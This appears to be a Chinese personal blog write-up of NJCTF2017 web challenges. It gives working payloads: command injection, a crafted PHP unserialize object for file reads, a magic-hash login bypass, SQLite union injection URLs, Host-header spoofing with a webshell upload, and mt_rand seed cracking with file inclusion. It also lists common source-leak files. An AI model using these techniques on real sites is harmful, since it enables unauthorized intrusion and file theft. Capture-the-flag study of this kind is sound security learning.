<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Write-up," />








  <link rel="shortcut icon" type="image/x-icon" href="/img/111.png?v=5.1.1" />






<meta name="description" content="NJCTF题目还是不错的，虽然很多都没做出来，总结总结慢慢积累">
<meta property="og:type" content="article">
<meta property="og:title" content="NJCTF2017">
<meta property="og:url" content="http://isron.cn/2017/03/15/NJCTF2017/index.html">
<meta property="og:site_name" content="Isron">
<meta property="og:description" content="NJCTF题目还是不错的，虽然很多都没做出来，总结总结慢慢积累">
<meta property="og:image" content="http://i1.piimg.com/567571/3fef7aff8ed61a23.png">
<meta property="og:image" content="http://p1.bpimg.com/567571/f92d79e53847c0b2.png">
<meta property="og:image" content="http://p1.bpimg.com/567571/83296ce306a25555.png">
<meta property="og:image" content="http://i1.piimg.com/567571/c5d8b7942fde18dc.png">
<meta property="og:image" content="http://i1.piimg.com/567571/4b90803e9609112f.png">
<meta property="og:image" content="http://i1.piimg.com/567571/7a56c50170c787ae.png">
<meta property="og:image" content="http://p1.bqimg.com/567571/e63b285dd2955ad6.png">
<meta property="og:image" content="http://i1.piimg.com/567571/91e9a0546b90c52f.png">
<meta property="og:image" content="http://i1.piimg.com/567571/b5e9fe58fac504d9.png">
<meta property="og:updated_time" content="2017-06-17T11:47:15.500Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="NJCTF2017">
<meta name="twitter:description" content="NJCTF题目还是不错的，虽然很多都没做出来，总结总结慢慢积累">
<meta name="twitter:image" content="http://i1.piimg.com/567571/3fef7aff8ed61a23.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://isron.cn/2017/03/15/NJCTF2017/"/>





  <title>NJCTF2017 | Isron</title>
  














</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Isron</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">The dream is to be realized.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://isron.cn/2017/03/15/NJCTF2017/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Isron">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/img/111.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Isron">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">NJCTF2017</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-03-15T10:20:48+08:00">
                2017-03-15
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a class="cloud-tie-join-count" href="/2017/03/15/NJCTF2017/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count join-count" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>NJCTF题目还是不错的，虽然很多都没做出来，总结总结慢慢积累<a id="more"></a></p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="Login"><a href="#Login" class="headerlink" title="Login"></a>Login</h2><p>打开发现让登录，右下可以注册，直接想到去年ISCC的mysql超长字符串截取，注册admin             q,由于mysql只截取前十六位所以直接用admin就能登陆获取flag。</p>
<h2 id="Get-Flag"><a href="#Get-Flag" class="headerlink" title="Get Flag"></a>Get Flag</h2><p>一个输入框可以查询图片信息，随便输入一个发现<br><img src="http://i1.piimg.com/567571/3fef7aff8ed61a23.png" alt=""><br>base64解码之后发现是<code>cat: images/....: No such file or directory</code>发现了一个cat想到是linux命令但是也没深入去想然后<a href="https://RcoIl.github.io" target="_blank" rel="external">傻仔</a>告诉我是命令执行,尝试利用管道命令||发现返回<br><img src="http://p1.bpimg.com/567571/f92d79e53847c0b2.png" alt=""><br>说明过滤掉了||，然后告诉我说用&amp;进行命令执行<a href="http://isron.cn/2017/03/15/Linux_shell/">各种分隔符之间的区别</a><br>payload：<code>&amp; cd ../../ &amp;&amp; ls</code>,<code>&amp; cd ../../ &amp;&amp; cat 9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag</code></p>
<h2 id="Text-wall"><a href="#Text-wall" class="headerlink" title="Text wall"></a>Text wall</h2><p>一个留言墙发现可以随便留言，最开始想的是XSS但是发现并没有什么卵用，通过查看cookies:<code>24c5889e00902d6bcc65073f0e91ea30bbe203c2a:1:{i:0;s:9:&quot;hiehiehie&quot;;}</code>发现是PHP序列化，将<code>a:1:{i:0;s:9:&quot;hiehiehie&quot;;}</code>SHA1加密后正是前面的内容，然后就没头绪了，学长说在.index.php.swo下有源码，还是知识太少，获得源码<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta">&lt;?php</span></span></div><div class="line">$lists = [];</div><div class="line"><span class="class"><span class="keyword">Class</span> <span class="title">filelist</span></span>&#123;</div><div class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span></span></div><div class="line">    &#123;</div><div class="line">        <span class="keyword">return</span> highlight_file(<span class="string">'hiehiehie.txt'</span>, <span class="keyword">true</span>).highlight_file(<span class="keyword">$this</span>-&gt;source, <span class="keyword">true</span>);</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line">........</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<pre><code>highlight_file ： 语法高亮一个文件
</code></pre><p>得到源码那么就构造PHP序列化然后通过他的<code>__toString</code>方法去读取文件<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta">&lt;?php</span></span></div><div class="line"><span class="class"><span class="keyword">Class</span> <span class="title">filelist</span></span>&#123;</div><div class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span></span></div><div class="line">    &#123;</div><div class="line">        <span class="keyword">return</span> highlight_file(<span class="string">'hiehiehie.txt'</span>, <span class="keyword">true</span>).highlight_file(<span class="keyword">$this</span>-&gt;source, <span class="keyword">true</span>);</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line">$a = <span class="keyword">new</span> filelist;</div><div class="line">$a-&gt;source = <span class="string">'index.php'</span>;</div><div class="line">$d = serialize([$a]);</div><div class="line">$b = sha1($d).$d;</div><div class="line"><span class="keyword">echo</span> urlencode($b);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p><img src="http://p1.bpimg.com/567571/83296ce306a25555.png" alt=""><br>得到源码知道flag的位置那么<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$a</span>-&gt;<span class="built_in">source</span> = <span class="string">'/var/www/PnK76P1IDfY5KrwsJrh1pL3c6XJ3fj7E_fl4g'</span>;</div></pre></td></tr></table></figure></p>
<p>得到flag<a href="http://isron.cn/2017/03/03/php_unserialize/">PHP序列化</a></p>
<h3 id="SHA1加密与MD5"><a href="#SHA1加密与MD5" class="headerlink" title="SHA1加密与MD5"></a>SHA1加密与MD5</h3><p>MD5加密后共32位，SHA1加密后共40位都由1-9,a-f组成</p>
<h3 id="源码泄露"><a href="#源码泄露" class="headerlink" title="源码泄露"></a>源码泄露</h3><p>目前所知道的有：</p>
<ul>
<li>index.php.bak ： 备份文件源码泄露</li>
<li>.index.php.swp ： vim异常退出源码泄露</li>
<li>.index.php.swo ： 交换文件源码泄露</li>
<li>index.php~ ： linux临时文件源码泄露</li>
<li>www.zip ： 压缩包源码泄露</li>
<li>git源码泄露</li>
</ul>
<h2 id="Wallet"><a href="#Wallet" class="headerlink" title="Wallet"></a>Wallet</h2><p>扫描发现有www.zip压缩包源码泄露，然后得到hint：压缩包密码为弱口令，然后就弱智的在那爆破，后来大师傅说就是njctf2017，很难受，宛如一个智障。<br><img src="http://i1.piimg.com/567571/c5d8b7942fde18dc.png" alt=""><br>打开发现是PHPjm加密<a href="http://tool.lu/php/" target="_blank" rel="external">PHPjm解密</a>得到源码:<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta">&lt;?php</span></span></div><div class="line"><span class="keyword">require_once</span> <span class="string">"db.php"</span>;</div><div class="line">$auth = <span class="number">0</span>;</div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_COOKIE[<span class="string">"auth"</span>])) &#123;</div><div class="line">    $auth = $_COOKIE[<span class="string">"auth"</span>];</div><div class="line">    $hsh = $_COOKIE[<span class="string">"hsh"</span>];</div><div class="line">    <span class="keyword">if</span> ($auth == $hsh) &#123;</div><div class="line">        $auth = <span class="number">0</span>;</div><div class="line">    &#125; <span class="keyword">else</span> &#123;</div><div class="line">        <span class="keyword">if</span> (sha1((string) $hsh) == md5((string) $auth)) &#123;</div><div class="line">            $auth = <span class="number">1</span>;</div><div class="line">        &#125; <span class="keyword">else</span> &#123;</div><div class="line">            $auth = <span class="number">0</span>;</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line">&#125; <span class="keyword">else</span> &#123;</div><div class="line">    $auth = <span class="number">0</span>;</div><div class="line">    $s = $auth;</div><div class="line">    setcookie(<span class="string">"auth"</span>, $s);</div><div class="line">    setcookie(<span class="string">"hsh"</span>, sha1((string) $s));</div><div class="line">&#125;</div><div class="line"><span class="keyword">if</span> ($auth) &#123;</div><div class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'query'</span>])) &#123;</div><div class="line">        $db = <span class="keyword">new</span> SQLite3($SQL_DATABASE, SQLITE3_OPEN_READONLY);</div><div class="line">        $qstr = SQLITE3::escapeString($_GET[<span class="string">'query'</span>]);</div><div class="line">        $query = <span class="string">"SELECT amount FROM my_wallets WHERE id=&#123;$qstr&#125;"</span>;</div><div class="line">        $result = $db-&gt;querySingle($query);</div><div class="line">        <span class="keyword">if</span> (!$result === <span class="keyword">NULL</span>) &#123;</div><div class="line">            <span class="keyword">echo</span> <span class="string">"Error - invalid query"</span>;</div><div class="line">        &#125; <span class="keyword">else</span> &#123;</div><div class="line">            <span class="keyword">echo</span> <span class="string">"Wallet contains: &#123;$result&#125;"</span>;</div><div class="line">        &#125;</div><div class="line">    &#125; <span class="keyword">else</span> &#123;</div><div class="line">        <span class="keyword">echo</span> <span class="string">"&lt;html&gt;&lt;head&gt;&lt;title&gt;Admin Page&lt;/title&gt;&lt;/head&gt;&lt;body&gt;Welcome to the admin panel!&lt;br /&gt;&lt;br /&gt;&lt;form name='input' action='admin.php' method='get'&gt;Wallet ID: &lt;input type='text' name='query'&gt;&lt;input type='submit' value='Submit Query'&gt;&lt;/form&gt;&lt;/body&gt;&lt;/html&gt;"</span>;</div><div class="line">    &#125;</div><div class="line">&#125; <span class="keyword">else</span> &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">"Sorry, not authorized."</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>存在一个<code>sha1((string) $hsh) == md5((string) $auth)</code>想到用0e去突破限制<code>auth:240610708 == hsh：aaroZmOk</code>然后就是一个sqlite数据库的sql注入，由于只接触了mysql数据库的语句，直接附上大佬的payload：</p>
<pre><code>爆表：http://218.2.197.235:23723/admin.php?query=1 union SELECT tbl_name FROM sqlite_master limit 1,1
爆字段：http://218.2.197.235:23723/admin.php?query=1 union SELECT sql FROM sqlite_master limit 2,1
爆内容：http://218.2.197.235:23723/admin.php?query=1 union SELECT id FROM flag limit 1,1
</code></pre><h2 id="pictures-wall"><a href="#pictures-wall" class="headerlink" title="pictures wall"></a>pictures wall</h2><p>随便输入就能登陆，然后提示只有root才有上传权限 在upload/1.tar.gz下发现源码，在login.php发现<br><figure class="highlight ruby"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">$ip = $_SERVER[<span class="string">'HTTP_HOST'</span>];</div><div class="line">        <span class="keyword">if</span>($ip == <span class="string">"::1"</span> <span class="params">||</span> $ip == <span class="string">"127.0.0.1"</span>)&#123;</div><div class="line">            $_SESSION[<span class="string">"token"</span>] = <span class="string">"0"</span>;</div></pre></td></tr></table></figure></p>
<p>在登录时修改host头为127.0.0.1成功获取root权限，查看upload.php发现，可以上传phtml与phps。<br><img src="http://i1.piimg.com/567571/4b90803e9609112f.png" alt=""><br>直接上传一句话发现只是打印出来并没有解析，那么就构造<br><img src="http://i1.piimg.com/567571/7a56c50170c787ae.png" alt=""><br>得到文件地址：<br>payload：</p>
<pre><code>i=echo `ls ../../`;
i=echo `cat /var/www/AOvU7WJDRTxn1tv2g56SJLpJK1l7EmBi_thi5_flag`;
</code></pre><h2 id="Guess"><a href="#Guess" class="headerlink" title="Guess"></a>Guess</h2><p>在上传时发现<code>http://218.2.197.235:23735/?page=upload</code>觉得存在文件包含漏洞，利用php的filter流尝试一下得到源码<code>http://218.2.197.235:23735/?page=php://filter/convert.base64-encode/resource=upload</code><br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta">&lt;?php</span></span></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">show_error_message</span><span class="params">($message)</span></span></div><div class="line"><span class="title">function</span> <span class="title">show_message</span><span class="params">($message)</span></div><div class="line"><span class="title">function</span> <span class="title">random_str</span><span class="params">($length = <span class="string">"32"</span>)</span></div><div class="line">&#123;</div><div class="line">    $set = <span class="keyword">array</span>(<span class="string">"a"</span>, <span class="string">"A"</span>, <span class="string">"b"</span>, <span class="string">"B"</span>, <span class="string">"c"</span>, <span class="string">"C"</span>, <span class="string">"d"</span>, <span class="string">"D"</span>, <span class="string">"e"</span>, <span class="string">"E"</span>, <span class="string">"f"</span>, <span class="string">"F"</span>,</div><div class="line">        <span class="string">"g"</span>, <span class="string">"G"</span>, <span class="string">"h"</span>, <span class="string">"H"</span>, <span class="string">"i"</span>, <span class="string">"I"</span>, <span class="string">"j"</span>, <span class="string">"J"</span>, <span class="string">"k"</span>, <span class="string">"K"</span>, <span class="string">"l"</span>, <span class="string">"L"</span>,</div><div class="line">        <span class="string">"m"</span>, <span class="string">"M"</span>, <span class="string">"n"</span>, <span class="string">"N"</span>, <span class="string">"o"</span>, <span class="string">"O"</span>, <span class="string">"p"</span>, <span class="string">"P"</span>, <span class="string">"q"</span>, <span class="string">"Q"</span>, <span class="string">"r"</span>, <span class="string">"R"</span>,</div><div class="line">        <span class="string">"s"</span>, <span class="string">"S"</span>, <span class="string">"t"</span>, <span class="string">"T"</span>, <span class="string">"u"</span>, <span class="string">"U"</span>, <span class="string">"v"</span>, <span class="string">"V"</span>, <span class="string">"w"</span>, <span class="string">"W"</span>, <span class="string">"x"</span>, <span class="string">"X"</span>,</div><div class="line">        <span class="string">"y"</span>, <span class="string">"Y"</span>, <span class="string">"z"</span>, <span class="string">"Z"</span>, <span class="string">"1"</span>, <span class="string">"2"</span>, <span class="string">"3"</span>, <span class="string">"4"</span>, <span class="string">"5"</span>, <span class="string">"6"</span>, <span class="string">"7"</span>, <span class="string">"8"</span>, <span class="string">"9"</span>);</div><div class="line">    $str = <span class="string">''</span>;</div><div class="line"></div><div class="line">    <span class="keyword">for</span> ($i = <span class="number">1</span>; $i &lt;= $length; ++$i) &#123;</div><div class="line">        $ch = mt_rand(<span class="number">0</span>, count($set) - <span class="number">1</span>);</div><div class="line">        $str .= $set[$ch];</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">return</span> $str;</div><div class="line">&#125;</div><div class="line"></div><div class="line">session_start();</div><div class="line"></div><div class="line">$reg=<span class="string">'/gif|jpg|jpeg|png/'</span>;</div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) &#123;</div><div class="line"></div><div class="line">    $seed = rand(<span class="number">0</span>,<span class="number">999999999</span>);</div><div class="line">    mt_srand($seed);</div><div class="line">    $ss = mt_rand();</div><div class="line">    $hash = md5(session_id() . $ss);</div><div class="line">    setcookie(<span class="string">'SESSI0N'</span>, $hash, time() + <span class="number">3600</span>);</div><div class="line"></div><div class="line">    <span class="keyword">if</span> ($_FILES[<span class="string">"file"</span>][<span class="string">"error"</span>] &gt; <span class="number">0</span>) &#123;</div><div class="line">        show_error_message(<span class="string">"Upload ERROR. Return Code: "</span> . $_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"error"</span>]);</div><div class="line">    &#125;</div><div class="line">    $check1 = ((($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>] == <span class="string">"image/gif"</span>)</div><div class="line">            || ($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>] == <span class="string">"image/jpeg"</span>)</div><div class="line">            || ($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>] == <span class="string">"image/pjpeg"</span>)</div><div class="line">            || ($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>] == <span class="string">"image/png"</span>))</div><div class="line">        &amp;&amp; ($_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"size"</span>] &lt; <span class="number">204800</span>));</div><div class="line">    $check2=!preg_match($reg,pathinfo($_FILES[<span class="string">'file-upload-field'</span>][<span class="string">'name'</span>], PATHINFO_EXTENSION));</div><div class="line"></div><div class="line"></div><div class="line">    <span class="keyword">if</span> ($check2) show_error_message(<span class="string">"Nope!"</span>);</div><div class="line">    <span class="keyword">if</span> ($check1) &#123;</div><div class="line">        $filename = <span class="string">'./uP1O4Ds/'</span> . random_str() . <span class="string">'_'</span> . $_FILES[<span class="string">'file-upload-field'</span>][<span class="string">'name'</span>];</div><div class="line">        <span class="keyword">if</span> (move_uploaded_file($_FILES[<span class="string">'file-upload-field'</span>][<span class="string">'tmp_name'</span>], $filename)) &#123;</div><div class="line">            show_message(<span class="string">"Upload successfully. File type:"</span> . $_FILES[<span class="string">"file-upload-field"</span>][<span class="string">"type"</span>]);</div><div class="line">        &#125; <span class="keyword">else</span> show_error_message(<span class="string">"Something wrong with the upload..."</span>);</div><div class="line">    &#125; <span class="keyword">else</span> &#123;</div><div class="line">        show_error_message(<span class="string">"only allow gif/jpeg/png files smaller than 200kb!"</span>);</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p>可以看到是对文件做了一个白名单限制，然后在原文件名前加了随机字符串，爆破是不可能爆破的，因为有32^61种可能，注意到<code>random_str</code>是通过下面<code>mt_rand()</code>进行随机数的生成<br><figure class="highlight perl"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">$seed = <span class="keyword">rand</span>(<span class="number">0</span>,<span class="number">999999999</span>);</div><div class="line">    mt_srand($seed);</div><div class="line">    $ss = mt_rand();</div><div class="line">    $hash = md5(session_id() . $ss);</div><div class="line">    setcookie(<span class="string">'SESSI0N'</span>, $hash, <span class="keyword">time</span>() + <span class="number">3600</span>);</div></pre></td></tr></table></figure></p>
<p>我们通过使session为空，使得生成的md5为纯数字，将md5放到网上查询发现需要付费，那么就自己写一段代码爆破一下：<br><figure class="highlight aspectj"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> hashlib</div><div class="line">c = <span class="string">'90369fd9718fd781f4b61b8cc5a1c991'</span></div><div class="line">i=<span class="number">0</span></div><div class="line"><span class="keyword">while</span> (i&lt;<span class="number">999999999</span>):</div><div class="line">    a = str(i)</div><div class="line">    b = hashlib.md5(a)</div><div class="line">    d = str(b.hexdigest())</div><div class="line">    <span class="keyword">if</span> (d == c):</div><div class="line">        print a</div><div class="line">        print d</div><div class="line">        <span class="keyword">break</span></div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        i=i+1</div></pre></td></tr></table></figure></p>
<p>跑了二十分钟才跑出来为<code>664794591</code>，看write up说用到这样一个<a href="http://download.openwall.net/pub/projects/php_mt_seed/" target="_blank" rel="external">工具</a>一个c语言写的求seed的工具，刚开始不会用，原来在linux下可以直接gcc编译然后运行:<br><img src="http://p1.bqimg.com/567571/e63b285dd2955ad6.png" alt=""><br>然后直接用加密代码得到文件名<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta">&lt;?php</span></span></div><div class="line">$set = <span class="keyword">array</span>(<span class="string">"a"</span>, <span class="string">"A"</span>, <span class="string">"b"</span>, <span class="string">"B"</span>, <span class="string">"c"</span>, <span class="string">"C"</span>, <span class="string">"d"</span>, <span class="string">"D"</span>, <span class="string">"e"</span>, <span class="string">"E"</span>, <span class="string">"f"</span>, <span class="string">"F"</span>,</div><div class="line">    <span class="string">"g"</span>, <span class="string">"G"</span>, <span class="string">"h"</span>, <span class="string">"H"</span>, <span class="string">"i"</span>, <span class="string">"I"</span>, <span class="string">"j"</span>, <span class="string">"J"</span>, <span class="string">"k"</span>, <span class="string">"K"</span>, <span class="string">"l"</span>, <span class="string">"L"</span>,</div><div class="line">    <span class="string">"m"</span>, <span class="string">"M"</span>, <span class="string">"n"</span>, <span class="string">"N"</span>, <span class="string">"o"</span>, <span class="string">"O"</span>, <span class="string">"p"</span>, <span class="string">"P"</span>, <span class="string">"q"</span>, <span class="string">"Q"</span>, <span class="string">"r"</span>, <span class="string">"R"</span>,</div><div class="line">    <span class="string">"s"</span>, <span class="string">"S"</span>, <span class="string">"t"</span>, <span class="string">"T"</span>, <span class="string">"u"</span>, <span class="string">"U"</span>, <span class="string">"v"</span>, <span class="string">"V"</span>, <span class="string">"w"</span>, <span class="string">"W"</span>, <span class="string">"x"</span>, <span class="string">"X"</span>,</div><div class="line">    <span class="string">"y"</span>, <span class="string">"Y"</span>, <span class="string">"z"</span>, <span class="string">"Z"</span>, <span class="string">"1"</span>, <span class="string">"2"</span>, <span class="string">"3"</span>, <span class="string">"4"</span>, <span class="string">"5"</span>, <span class="string">"6"</span>, <span class="string">"7"</span>, <span class="string">"8"</span>, <span class="string">"9"</span>);</div><div class="line">$seed=<span class="number">451382085</span>;</div><div class="line">mt_srand($seed);</div><div class="line">$ss = mt_rand();</div><div class="line">$str=<span class="string">""</span>;</div><div class="line"><span class="keyword">for</span> ($i = <span class="number">1</span>; $i &lt;= <span class="number">32</span>; ++$i) &#123;</div><div class="line">    $ch = mt_rand(<span class="number">0</span>, count($set) - <span class="number">1</span>);</div><div class="line">    $str .= $set[$ch];</div><div class="line">&#125;</div><div class="line"><span class="keyword">echo</span> $str;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p>利用phar伪协议包含ZIP文件得到shell，由于最开始大意弄成了RAR发现phar只适合ZIP格式。</p>
